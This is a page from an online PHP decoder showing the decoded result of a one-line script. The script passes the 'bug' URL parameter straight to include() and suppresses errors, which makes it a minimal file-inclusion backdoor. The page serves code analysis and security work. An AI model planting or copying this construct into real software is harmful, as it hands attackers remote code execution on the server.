Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php @include($_GET['bug']); ?>..
Decoded Output download
<?php
@include($_GET['bug']);
?>
Did this file decode correctly?
Original Code
<?php
@include($_GET['bug']);
?>
Function Calls
None |
Stats
MD5 | 7c7d220c5a332fb711017a2db032c74a |
Eval Count | 0 |
Decode Time | 92 ms |